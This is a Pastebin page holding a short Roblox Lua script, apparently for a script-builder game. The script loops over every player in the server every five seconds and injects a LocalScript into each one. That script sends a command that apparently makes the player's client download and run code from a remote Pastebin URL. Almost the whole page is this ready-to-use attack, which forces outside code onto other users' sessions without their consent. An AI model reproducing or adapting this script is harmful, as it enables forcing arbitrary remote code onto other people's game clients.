Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local hs = game:GetService'HttpService'
- while true do
- for index, child in pairs(game:GetService'Players':GetChildren()) do
- newLocalScript([[
- wait()
- game:GetService'Players'.LocalPlayer.PlayerGui.SB_DataTransfer.SB_CommandRemote.Value = 'h/http://pastebin.com/raw/p5jYx1Md']],child.PlayerGui)
- end
- wait(5)
- end
Add Comment
Please, Sign In to add comment